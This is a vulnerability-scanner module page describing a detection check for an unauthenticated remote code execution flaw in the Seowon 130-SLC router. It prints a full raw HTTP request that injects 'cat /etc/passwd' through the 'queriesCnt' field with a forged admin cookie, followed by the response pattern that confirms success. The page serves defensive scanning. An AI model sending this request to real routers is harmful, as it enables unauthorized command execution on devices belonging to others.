Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Seowon 130-SLC router - Remote Code Execution

By kannthu

Critical
Vidoc logoVidoc Module
#unauth#iot#edb#rce#seowon
Description

What is the "Seowon 130-SLC router - Remote Code Execution?"

The "Seowon 130-SLC router - Remote Code Execution" module is designed to detect a critical vulnerability in the Seowon 130-SLC router. This vulnerability allows remote attackers to execute commands without authentication as admin users via the router's IP and Port (if available) in the request. The severity of this vulnerability is classified as critical, indicating the potential for significant damage if exploited.

This module was authored by gy741.

Impact

If successfully exploited, this vulnerability could allow attackers to gain unauthorized access to the Seowon 130-SLC router and execute arbitrary commands with administrative privileges. This can lead to a complete compromise of the router, enabling further malicious activities such as data theft, network disruption, or unauthorized configuration changes.

How the module works?

The "Seowon 130-SLC router - Remote Code Execution" module works by sending a crafted HTTP request to the target router. The request includes specific parameters and headers to trigger the vulnerability. The module then checks the response for specific conditions to determine if the vulnerability is present.

One example of an HTTP request used by this module:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded
Referer: /diagnostic.html?t=201701020919
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin

Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928

The module then applies matching conditions to the response to determine if the vulnerability is present. These conditions include checking the response body for the presence of the "root:.*:0:0:" pattern and verifying that the HTTP status code is 200.

For more information, please refer to the module's reference.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
regex: root:.*:0:0:and
status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability